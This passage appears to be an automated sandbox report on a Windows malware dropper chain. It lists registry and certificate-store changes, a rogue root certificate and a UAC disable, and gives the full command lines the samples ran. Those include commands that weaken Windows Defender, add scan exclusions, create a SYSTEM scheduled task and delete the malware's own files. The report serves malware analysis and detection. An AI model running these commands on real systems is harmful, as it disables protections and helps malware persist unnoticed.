| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS68.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS68.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Windows\SysWOW64\rundll32.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{b8b1c3f9-0000-0000-0000-d01200000000} | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket | C:\Users\Admin\AppData\Local\Temp\7zS68.tmp\Install.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = 6024b221ea3a6910a2dc08002b30309d9c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Users\Admin\AppData\Local\Temp\7zS68.tmp\Install.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\7zS68.tmp\Install.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 | C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Pictures\6gOQA073DOsYkG6b0EgvvAcd.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Pictures\6gOQA073DOsYkG6b0EgvvAcd.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exe"
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
"C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"
C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe
"C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe
"C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe"
C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"
C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"
C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe
"C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1428 -ip 1428
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 276
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe
"C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe
"C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4508 -ip 4508
C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe
"C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 244
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 5
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe" -Force
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
C:\Users\Admin\Pictures\ThdYwKZvKmIzn3rj3JtxK05A.exe
"C:\Users\Admin\Pictures\ThdYwKZvKmIzn3rj3JtxK05A.exe" /s
C:\Users\Admin\Pictures\SJLhmzYCwLH1f34kc7MVy0ZE.exe
"C:\Users\Admin\Pictures\SJLhmzYCwLH1f34kc7MVy0ZE.exe"
C:\Users\Admin\Pictures\5MoH8bIPQ8SA8ROOsxUfnRrI.exe
"C:\Users\Admin\Pictures\5MoH8bIPQ8SA8ROOsxUfnRrI.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
C:\Users\Admin\Pictures\6gOQA073DOsYkG6b0EgvvAcd.exe
"C:\Users\Admin\Pictures\6gOQA073DOsYkG6b0EgvvAcd.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Users\Admin\Pictures\mmlrDdjIh8SWGrRHE0rDm0Rb.exe
"C:\Users\Admin\Pictures\mmlrDdjIh8SWGrRHE0rDm0Rb.exe"
C:\Users\Admin\AppData\Local\Temp\7zSFE84.tmp\Install.exe
.\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS68.tmp\Install.exe
.\Install.exe /NQHxdidUQs "385118" /S
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bqGGCwwWIommTRgeuN" /SC once /ST 03:47:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS68.tmp\Install.exe\" 1g /qbadidbfTx 385118 /S" /V1 /F
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bqGGCwwWIommTRgeuN"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
/C schtasks /run /I /tn bqGGCwwWIommTRgeuN
\??\c:\windows\SysWOW64\schtasks.exe
schtasks /run /I /tn bqGGCwwWIommTRgeuN
C:\Users\Admin\AppData\Local\Temp\7zS68.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS68.tmp\Install.exe 1g /qbadidbfTx 385118 /S
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
C:\Windows\SysWOW64\cmd.exe
